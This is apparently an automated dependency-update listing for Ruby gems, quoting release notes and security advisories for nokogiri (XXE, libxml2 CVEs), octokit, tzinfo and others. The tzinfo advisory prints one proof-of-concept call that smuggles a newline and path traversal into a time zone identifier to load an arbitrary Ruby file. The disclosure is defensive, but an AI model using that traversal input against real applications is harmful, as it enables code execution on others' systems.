🚨 Improper Restriction of XML External Entity Reference (XXE) in Nokogiri on JRuby

Severity

The Nokogiri maintainers have evaluated this as High Severity 7.5 (CVSS3.0) for JRuby users. (This security advisory does not apply to CRuby users.)

Impact

In Nokogiri v1.12.4 and earlier, on JRuby only, the SAX parser resolves external entities by default.

Users of Nokogiri on JRuby who parse untrusted documents using any of these classes are affected:

Nokogiri::XML::SAX::Parser

Nokogiri::HTML4::SAX::Parser or its alias Nokogiri::HTML::SAX::Parser

Nokogiri::XML::SAX::PushParser

Nokogiri::HTML4::SAX::PushParser or its alias Nokogiri::HTML::SAX::PushParser

Mitigation

JRuby users should upgrade to Nokogiri v1.12.5 or later. There are no workarounds available for v1.12.4 or earlier.

CRuby users are not affected.

🚨 Nokogiri updates packaged dependency on libxml2 from 2.9.10 to 2.9.12

Summary

Nokogiri v1.11.4 updates the vendored libxml2 from v2.9.10 to v2.9.12 which addresses:

CVE-2019-20388 (Medium severity)

CVE-2020-24977 (Medium severity)

CVE-2021-3517 (Medium severity)

CVE-2021-3518 (Medium severity)

CVE-2021-3537 (Low severity)

CVE-2021-3541 (Low severity)

Note that two additional CVEs were addressed upstream but are not relevant to this release. CVE-2021-3516 via xmllint is not present in Nokogiri, and CVE-2020-7595 has been patched in Nokogiri since v1.10.8 (see #1992).

Please note that this advisory only applies to the CRuby implementation of Nokogiri < 1.11.4, and only if the packaged version of libxml2 is being used. If you've overridden defaults at installation time to use system libraries instead of packaged libraries, you should instead pay attention to your distro's libxml2 release announcements.

Mitigation

Upgrade to Nokogiri >= 1.11.4.

Impact

I've done a brief analysis of the published CVEs that are addressed in this upstream release. The libxml2 maintainers have not released a canonical set of CVEs, and so this list is pieced together from secondary sources and may be incomplete.

All information below is sourced from security.archlinux.org, which appears to have the most up-to-date information as of this analysis.

CVE-2019-20388

Severity: Medium

Type: Denial of service

Description: A memory leak was found in the xmlSchemaValidateStream function of libxml2. Applications that use this library may be vulnerable to memory not being freed leading to a denial of service.

Fixed: https://gitlab.gnome.org/GNOME/libxml2/commit/7ffcd44d7e6c46704f8af0321d9314cd26e0e18a

Verified that the fix commit first appears in v2.9.11. It seems possible that this issue would be present in programs using Nokogiri < v1.11.4.

CVE-2020-7595

Severity: Medium

Type: Denial of service

Description: xmlStringLenDecodeEntities in parser.c in libxml2 2.9.10 has an infinite loop in a certain end-of-file situation.

Fixed: https://gitlab.gnome.org/GNOME/libxml2/commit/0e1a49c8907645d2e155f0d89d4d9895ac5112b5

This has been patched in Nokogiri since v1.10.8 (see #1992).

CVE-2020-24977

Severity: Medium

Type: Information disclosure

Description: GNOME project libxml2 <= 2.9.10 has a global buffer over-read vulnerability in xmlEncodeEntitiesInternal at libxml2/entities.c.

Fixed: https://gitlab.gnome.org/GNOME/libxml2/commit/50f06b3efb638efb0abd95dc62dca05ae67882c2

Verified that the fix commit first appears in v2.9.11. It seems possible that this issue would be present in programs using Nokogiri < v1.11.4.

CVE-2021-3516

Severity: Medium

Type: Arbitrary code execution (no remote vector)

Description: A use-after-free security issue was found libxml2 before version 2.9.11 when "xmllint --html --push" is used to process crafted files.

Issue: https://gitlab.gnome.org/GNOME/libxml2/-/issues/230

Fixed: https://gitlab.gnome.org/GNOME/libxml2/-/commit/1358d157d0bd83be1dfe356a69213df9fac0b539

Verified that the fix commit first appears in v2.9.11. This vector does not exist within Nokogiri, which does not ship xmllint.

CVE-2021-3517

Severity: Medium

Type: Arbitrary code execution

Description: A heap-based buffer overflow was found in libxml2 before version 2.9.11 when processing truncated UTF-8 input.

Issue: https://gitlab.gnome.org/GNOME/libxml2/-/issues/235

Fixed: https://gitlab.gnome.org/GNOME/libxml2/-/commit/bf22713507fe1fc3a2c4b525cf0a88c2dc87a3a2

Verified that the fix commit first appears in v2.9.11. It seems possible that this issue would be present in programs using Nokogiri < v1.11.4.

CVE-2021-3518

Severity: Medium

Type: Arbitrary code execution

Description: A use-after-free security issue was found in libxml2 before version 2.9.11 in xmlXIncludeDoProcess() in xinclude.c when processing crafted files.

Issue: https://gitlab.gnome.org/GNOME/libxml2/-/issues/237

Fixed: https://gitlab.gnome.org/GNOME/libxml2/-/commit/1098c30a040e72a4654968547f415be4e4c40fe7

Verified that the fix commit first appears in v2.9.11. It seems possible that this issue would be present in programs using Nokogiri < v1.11.4.

CVE-2021-3537

Severity: Low

Type: Denial of service

Description: It was found that libxml2 before version 2.9.11 did not propagate errors while parsing XML mixed content, causing a NULL dereference. If an untrusted XML document was parsed in recovery mode and post-validated, the flaw could be used to crash the application.

Issue: https://gitlab.gnome.org/GNOME/libxml2/-/issues/243

Fixed: https://gitlab.gnome.org/GNOME/libxml2/-/commit/babe75030c7f64a37826bb3342317134568bef61

Verified that the fix commit first appears in v2.9.11. It seems possible that this issue would be present in programs using Nokogiri < v1.11.4.

CVE-2021-3541

Severity: Low

Type: Denial of service

Description: A security issue was found in libxml2 before version 2.9.11. Exponential entity expansion attack its possible bypassing all existing protection mechanisms and leading to denial of service.

Fixed: https://gitlab.gnome.org/GNOME/libxml2/-/commit/8598060bacada41a0eb09d95c97744ff4e428f8e

Verified that the fix commit first appears in v2.9.11. It seems possible that this issue would be present in programs using Nokogiri < v1.11.4, however Nokogiri's default parse options prevent the attack from succeeding (it is necessary to opt into DTDLOAD which is off by default).

For more details supporting this analysis of this CVE, please visit #2233.

🚨 Nokogiri::XML::Schema trusts input by default, exposing risk of XXE vulnerability

Severity

Nokogiri maintainers have evaluated this as Low Severity (CVSS3 2.6).

Description

In Nokogiri versions <= 1.11.0.rc3, XML Schemas parsed by Nokogiri::XML::Schema are trusted by default, allowing external resources to be accessed over the network, potentially enabling XXE or SSRF attacks.

This behavior is counter to the security policy followed by Nokogiri maintainers, which is to treat all input as untrusted by default whenever possible.

Please note that this security fix was pushed into a new minor version, 1.11.x, rather than a patch release to the 1.10.x branch, because it is a breaking change for some schemas and the risk was assessed to be "Low Severity".

Affected Versions

Nokogiri <= 1.10.10 as well as prereleases 1.11.0.rc1, 1.11.0.rc2, and 1.11.0.rc3

Mitigation

There are no known workarounds for affected versions. Upgrade to Nokogiri 1.11.0.rc4 or later.

If, after upgrading to 1.11.0.rc4 or later, you wish to re-enable network access for resolution of external resources (i.e., return to the previous behavior):

Ensure the input is trusted. Do not enable this option for untrusted input.

When invoking the Nokogiri::XML::Schema constructor, pass as the second parameter an instance of Nokogiri::XML::ParseOptions with the NONET flag turned off.

So if your previous code was:
# in v1.11.0.rc3 and earlier, this call allows resources to be accessed over the network
# but in v1.11.0.rc4 and later, this call will disallow network access for external resources
schema = Nokogiri::XML::Schema.new(schema)

# in v1.11.0.rc4 and later, the following is equivalent to the code above
# (the second parameter is optional, and this demonstrates its default value)
schema = Nokogiri::XML::Schema.new(schema, Nokogiri::XML::ParseOptions::DEFAULT_SCHEMA)
Then you can add the second parameter to indicate that the input is trusted by changing it to:
# in v1.11.0.rc3 and earlier, this would raise an ArgumentError 
# but in v1.11.0.rc4 and later, this allows resources to be accessed over the network
schema = Nokogiri::XML::Schema.new(trusted_schema, Nokogiri::XML::ParseOptions.new.nononet)
References

This issue's public advisory

Original Hackerone report (private)

OWASP description of XXE attack

OWASP description of SSRF attack

Credit

This vulnerability was independently reported by @eric-therond and @gucki.

The Nokogiri maintainers would like to thank HackerOne for providing a secure, responsible mechanism for reporting, and for providing their fantastic service to us.

🚨 libxml as used in Nokogiri has an infinite loop in a certain end-of-file situation

xmlStringLenDecodeEntities in parser.c in libxml2 2.9.10 has an infinite loop in a certain end-of-file situation.
The Nokogiri RubyGem has patched its vendored copy of libxml2 in order to prevent this issue from affecting nokogiri.

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

↗️ octokit (indirect, 4.14.0 → 4.25.1) · Repo · Changelog

Security Advisories 🚨

🚨 Octokit gem published with world-writable files

Impact

Versions 4.23.0 and 4.24.0 of the octokit gem were published containing world-writeable files.

Specifically, the gem was packed with files having their permissions set to -rw-rw-rw- (i.e. 0666) instead of rw-r--r-- (i.e. 0644). This means everyone who is not the owner (Group and Public) with access to the instance where this release had been installed could modify the world-writable files from this gem.

Malicious code already present and running on your machine, separate from this package, could modify the gem’s files and change its behavior during runtime.

Patches

octokit 4.25.0

Workarounds

Users can use the previous version of the gem v4.22.0. Alternatively, users can modify the file permissions manually until they are able to upgrade to the latest version.

Release Notes

4.25.1

Stop configuring Faraday's retry middleware twice (@Edouard-chin)

Fix various Ruby warnings (e.g. missing parentheses) (@coryf)

4.25.0

✅ NOTE: This remediates A security advisory was published on versions 4.23.0 and 4.24.0 of this gem. You can read more about this in the published security advisory. ✅

DX Improvements

Rubocop improvements by @timrogers in #1441

Require multi-factor authentication to push new releases to RubyGems by @timrogers in #1443

CI Improvements

Updates all build scripts to be more durable and adds details on how to run a manual file integrity check by @nickfloyd in #1446

Housekeeping

Drop support for Ruby 1.9.2 in Octokit::Client::Contents#create_contents by @timrogers in #1442

Full Changelog: v4.24.0...v4.25.0

4.24.0

Known issues

Note: This release fixes the issue around autoloading modules causing some modules to not load before use #1428

Code improvements

#1354, #1426 Enabling Ruby's immutable ("frozen") string literals i.e. --enable-frozen-string-literal via @timrogers and @olleolleolle

CI Improvements

Adds Code QL analysis to octokit.rb via @nickfloyd

Bug fixes

#1428 Fixes module loading issue with autoloading (this reverts #1351 ) - more information here via @collinsauve. @waiting-for-dev, @etiennebarrie, @timrogers, and @nickfloyd

Full Changelog: v4.23.0...v4.24.0

4.23.0

Code improvements

#1382 Correctly raise Octokit::TooManyRequests when hitting secondary rate limit via @jasonopslevel

#1411 Adds support for Faraday v2 usage via @skryukov

CI Improvements

#1395 Adds Ruby 3.1 to CI via @petergoldstein

Performance improvements

#1351 Make clients autoload via @gmcgibbon

Bug fixes

#1297 Escape label names with URL characters via @Fryguy

#1375 Escape ref in archive_link via @max611

#1117 & #1419 Ensures that any nil parameters being passed in will initialize with Octokit's defaults instead of nil via @akerl, @nickfloyd

#1321 & #1415 Fixed total_count calculation when paginating results for check runs and check suites via @a2ikm, @matiasalbarello

#1121 Fixes service status methods via @vierarb

Documentation

#1414 replace git.io link in source docs via @wonda-tea-coffee

#1412 Document how and when the SDK raises exceptions via @timrogers

#1356 Fixes grammar and style via @nikoandpiko

Full Changelog: v4.22.0...v4.23.0

4.22.0

Deprecation Fix

#1359 Fix Faraday deprecation warning @ybiquitous

Code Improvements

#1336 Update regex for create ref @thepwagner

#1350 Support pagination in compare api @mrpinsky

CI and dependency updates

#1353 Add Ruby 3.0 support for CI builds @olleolleolle

#1387 Update pry-byebug requirement @ashishkeshan

Documentation

#1376 Update example README code with token filtering @bencolon

#1381 Update organization migration documentation links @rzhade3

4.21.0

API Support

#1319 Add delete workflow run support @szemek

#1322 Add match refs support @AHaymond

#1329 Add rename branch support @gmcgibbon

#1332 Add billing actions support @M-Yamashita01

Error handling

#1324 Handle path diff too large errors @yykamei

Code clean up

#1326 Remove graduated preview headers @ivailop

Documentation

#1314 Update authentication usage @curquiza

#1317 Fix logo link @gjtorikian

#1318 Fix GitHub typo @bl-ue

4.20.0

API Support

#1304 Added the ability to delete a deployment @jer-k

#1308 Add repo vulnerability alerts related functionality for repositories @calvinhughes

Bug fixes

#1309 Paginate outside_collaborators calls @sds

#1316 Uses of FaradayMiddleware#on_complete should not be private @tarebyte

Code improvements

#1131 Add CommitIsNotPartOfPullRequest error @wata727

#1303 Remove integrations preview header @MichaelViveros

#1307 Raise Octokit::InstallationSuspended when another error is received @yykamei

Documentation

#1302 Add documentation on how to specify the ref option for RubyDoc @aomathwift

#1311 Fix Code of Conduct link in Table of Contents @eduardoj

4.19.0

Code Improvements

#1223 Ensure a boolean is returned for application_authenticated @zakallen

#1255 Update api paths in the organization api to take ids @hmharvey

#1260 Fix last_response behavior after failures @JackTLi

#1253 Ensure adapters set SSL options properly @tjwallace

#1270 Add context around rate limit errors @jatindhankhar

API Support

#1252 Introduces support for the ActionWorkflow and ActionWorkflowRun APIs @petar-lazarov

#1236 Support for ActionsSecrets API @jylitalo

#1266 Support for get the authenticated app @kitop

#1281 Support for create a workflow dispatch event @igfoo

#1286 Support installation suspended failures @stmllr

#1288 Support for user migration endpoints @stmllr

Documentation

#1248 Fix documentation link for update a repository @spier

#1269 Update some documentation param names @tarebyte

#1276 Remove dangling phrase in CONTRIBUTING.md @igfoo

#1278 Link related doc in CONTRIBUTING.md @igfoo

#1279 Fix script typo in README.md @igfoo

#1291 Fix typo in authorizations comments @ohbarye

CI and dependency updates

#1206 Increased CI coverage @MSP-Greg

#1243 Add Ruby 2.7 CI support @ybiquitous

#1244 Removed coveralls dependency @hmharvey

#1263 Remove duplicated CI coverage @hmharvey

#1264 Keep running CI on PRs @hmharvey

4.18.0

Documentation

#1200 Fix an API link in the Search client @NickLaMuro

Preview Header Support

#1183 Enable issue events API to return project events @gammons

#1203 Update deprecated application API to new preview @oreoshake

Bug Fixes

#1201 Fix random test failures @MSP-Greg

#1218 Fix incorrect URLs for the Authorizations client @tarebyte

4.17.0

Documentation

#1200 Fix an API link in the Search client @NickLaMuro

Preview Header Support

#1183 Enable issue events API to return project events @gammons

#1203 Update deprecated application API to new preview @oreoshake

Bug Fixes

#1201 Fix random test failures @MSP-Greg

4.16.0

New features

#1187 Support for Commit Branches @tgmachina

Resolve deprecation warnings

#1192 Fix deprecation notice for authentication via query parameters @tarebyte

Documentation

#1137 Clarify force parameter documentation @rmacklin

#1186 Fix team_by_name example @steinbrueckri

#1190 Fix API links in the Apps client @ybiquitous

Tooling updates

#1185 Fix action builds against 4-stable @tarebyte

4.15.0

Preview header support
#1114 Adds drafts preview header @andrew
#1132 Update branch protection preview @spikex

New features
#1133 Support for template repositories @EricPickup
#1136 Add method to find team by name @gallexi
#1153 Add method to delete installation @yykamei
#1151 Add method to update pull request review @eric-silverman
#1162 Support for Commit pulls @tgmachina

Improved error handling
#1115 Add BillingIssue error @stmllr
#1106 Add TooLargeContent error @ybiquitous
#1164 Add SAMLProtected error @tarebyte

Resolve deprecation warnings
#1152 Fix version deprecation warning in ci builds @hmharvey
#1154 Fix faraday error subclass @Gasparila

Documentation
#1123 Add option in the pull request state parameter @4geru
#1135 Fix the contributing doc steps @gallexi
#1134 Fix the code example for update branch @rmacklin
#1139 Add assignee params @4geru
#1138 Update link to new collaborators api @shaunakpp
#1129 Add code of conduct @spikex
#1102 Update readme to point directly to v3 api @binhums

Tooling updates
#1142 Migrated to actions @tarebyte

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

↗️ public_suffix (indirect, 3.1.1 → 5.1.1) · Repo · Changelog

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

↗️ rb-fsevent (indirect, 0.10.3 → 0.11.2) · Repo

Release Notes

0.11.2

Avoid modifying string literals #91

0.11.1

rescue Errno::EBADF when closing pipe #92

0.11.0

Add arm64 arch to support Apple M1 guard/rb-fsevent#88

0.10.4

Remove bundler development dependency #85

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 14 commits:

↗️ rb-inotify (indirect, 0.10.0 → 0.11.1) · Repo

Commits

See the full diff on Github. The new version differs by 14 commits:

↗️ rouge (indirect, 2.2.1 → 3.30.0) · Repo · Changelog

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

↗️ rubyzip (indirect, 2.0.0 → 2.4.1) · Repo · Changelog

Release Notes

2.3.2 (from changelog)

A "dummy" release to warn about breaking changes coming in version 3.0. This updated version uses the Gem post_install_message instead of printing to STDERR.

2.3.1

This is a "dummy" release to warn about breaking changes coming in version 3.0.

2.3.0

Fix frozen string literal error #431

Set OutputStream.write_buffer's buffer to binmode #439

Upgrade rubocop and fix various linting complaints #437 #440

Tooling:

Add a bin/console script for development #420

Update rake requirement (development dependency only) to fix a security alert.

2.2.0

Add support for decompression plugin gems #427

2.1.0

Fix (at least partially) the restore_times and restore_permissions options to Zip::File.new #413

Previously, neither option did anything, regardless of what it was set to. We have therefore defaulted them to false to preserve the current behavior, for the time being. If you have explicitly set either to true, it will now have an effect.

Fix handling of UniversalTime (mtime, atime, ctime) fields. #421

Previously, Zip::File did not pass the options to Zip::Entry in some cases. #423

Note that restore_times in this release does nothing on Windows and only restores mtime, not atime or ctime.

Allow Zip::File.open to take an options hash like Zip::File.new #418

Always print warnings with warn, instead of a mix of puts and warn #416

Create temporary files in the system temporary directory instead of the directory of the zip file #411

Drop unused tmpdir requirement #411

Tooling

Move CI to xenial and include jruby on JDK11 #419

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

↗️ sawyer (indirect, 0.8.2 → 0.9.3) · Repo

Release Notes

0.9.3

What's Changed

Use https in Gemfile source by @gecunps in #76

CI: Tell dependabot to update GH Actions by @olleolleolle in #77

Bump actions/checkout from 4 to 5 by @dependabot[bot] in #78

Rakefile: add Bundler gem tasks by @olleolleolle in #80

New Contributors

@gecunps made their first contribution in #76

@olleolleolle made their first contribution in #77

@dependabot[bot] made their first contribution in #78

Full Changelog: v0.9.2...v0.9.3

0.9.1

What's Changed

Specify correct minimal Faraday version by @skryukov in #73

New Contributors

@skryukov made their first contribution in #73

Full Changelog: v0.9.0...v0.9.1

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 20 commits:

↗️ typhoeus (indirect, 1.3.1 → 1.6.0) · Repo · Changelog

Release Notes

1.6.0 (from changelog)

Full Changelog

Add Ruby 4.0 to CI matrix and update checkout action to v6. (Geremia Taglialatela, #744)

Require Ethon >= 0.18.0, removing the upper bound constraint. (Geremia Taglialatela, #742)

Update RubyDoc link in gemspec metadata. (Felipe Mesquita, #737)

Update gem version badge and remove Code Climate badge. (Felipe Mesquita, #736)

1.5.0 (from changelog)

Full Changelog

Update gemspec with metadata and remove extra files from the bundled gem. (Felipe Mesquita, #734)

Require Ruby 2.6+ and simplify Gemfile. (Felipe Mesquita, #733)

Add support for URI objects in Typhoeus.stub(). (Katelyn Schiesser, #732)

Add explicit require for logger and ostruct gems for Ruby 3.5+ compatibility. (Felipe Mesquita, #729)

Add Ruby 3.4 to CI matrix. (y-yagi, #728)

Support curl 8.9 error message changes in tests. (Mamoru TASAKA, #724)

Add Ruby 3.2 and 3.3 to CI, drop Ruby 2.5, lock ethon < 0.16.0. (y-yagi, #716)

Fix typo in comment: "reponse" → "response". (George Brocklehurst, #700)

1.4.0 (from changelog)

Full Changelog

1 feature

Faraday adapter exceptions namespace compatibility with Faraday v1 (@iMacTia in #616)

3 Others

Yard warning fixes (@olleolleolle in #622)

Add more Ruby versions in CI matrix (@olleolleolle in #623)

Use of argument passed in function instead of attr_reader (@v-kolesnikov in #625)

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

↗️ tzinfo (indirect, 1.2.5 → 1.2.11) · Repo · Changelog

Security Advisories 🚨

🚨 TZInfo relative path traversal vulnerability allows loading of arbitrary files

Impact

Affected versions

0.3.60 and earlier.

1.0.0 to 1.2.9 when used with the Ruby data source (tzinfo-data).

Vulnerability

With the Ruby data source (the tzinfo-data gem for tzinfo version 1.0.0 and later and built-in to earlier versions), time zones are defined in Ruby files. There is one file per time zone. Time zone files are loaded with require on demand. In the affected versions, TZInfo::Timezone.get fails to validate time zone identifiers correctly, allowing a new line character within the identifier. With Ruby version 1.9.3 and later, TZInfo::Timezone.get can be made to load unintended files with require, executing them within the Ruby process.

For example, with version 1.2.9, you can run the following to load a file with path /tmp/payload.rb:
TZInfo::Timezone.get("foo\n/../../../../../../../../../../../../../../../../tmp/payload")
The exact number of parent directory traversals needed will vary depending on the location of the tzinfo-data gem.

TZInfo versions 1.2.6 to 1.2.9 can be made to load files from outside of the Ruby load path. Versions up to and including 1.2.5 can only be made to load files from directories within the load path.

This could be exploited in, for example, a Ruby on Rails application using tzinfo version 1.2.9, that allows file uploads and has a time zone selector that accepts arbitrary time zone identifiers. The CVSS score and severity have been set on this basis.

Versions 2.0.0 and later are not vulnerable.

Patches

Versions 0.3.61 and 1.2.10 include fixes to correctly validate time zone identifiers (commit 9eddbb5 for 0.3.x and commit 9905ca9 for 1.2.x).

Note that version 0.3.61 can still load arbitrary files from the Ruby load path if their name follows the rules for a valid time zone identifier and the file has a prefix of tzinfo/definition within a directory in the load path. For example if /tmp/upload was in the load path, then TZInfo::Timezone.get('foo') could load a file with path /tmp/upload/tzinfo/definition/foo.rb. Applications should ensure that untrusted files are not placed in a directory on the load path.

Workarounds

As a workaround, the time zone identifier can be validated before passing to TZInfo::Timezone.get by ensuring it matches the regular expression \A[A-Za-z0-9+\-_]+(?:\/[A-Za-z0-9+\-_]+)*\z.

For more information

If you have any questions or comments about this advisory:

Open an issue in the tzinfo repository.

Release Notes

1.2.11

Eliminate Object#untaint deprecation warnings on JRuby 9.4.0.0. #145.

TZInfo v1.2.11 on RubyGems.org

1.2.10

Fixed a relative path traversal bug that could cause arbitrary files to be loaded with require when used with RubyDataSource. Please refer to
GHSA-5cm2-9h8c-rvfx for details. CVE-2022-31163.

Ignore the SECURITY file from Arch Linux's tzdata package. #134.

TZInfo v1.2.10 on RubyGems.org

1.2.9

Fixed an incorrect InvalidTimezoneIdentifier exception raised when loading a zoneinfo file that includes rules specifying an additional transition to the final defined offset (for example, Africa/Casablanca in version 2018e of the Time Zone Database). #123.

TZInfo v1.2.9 on RubyGems.org

1.2.8

Added support for handling "slim" format zoneinfo files that are produced by default by zic version 2020b and later. The POSIX-style TZ string is now used calculate DST transition times after the final defined transition in the file. The 64-bit section is now always used regardless of whether Time has support for 64-bit times. #120.

Rubinius is no longer supported.

TZInfo v1.2.8 on RubyGems.org

1.2.7

Fixed 'wrong number of arguments' errors when running on JRuby 9.0. #114.

Fixed warnings when running on Ruby 2.8. #112.

TZInfo v1.2.7 on RubyGems.org

1.2.6

Timezone#strftime('%s', time) will now return the correct number of seconds since the epoch. #91.

Removed the unused TZInfo::RubyDataSource::REQUIRE_PATH constant.

Fixed "SecurityError: Insecure operation - require" exceptions when loading data with recent Ruby releases in safe mode.

Fixed warnings when running on Ruby 2.7. #106 and #111.

TZInfo v1.2.6 on RubyGems.org

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.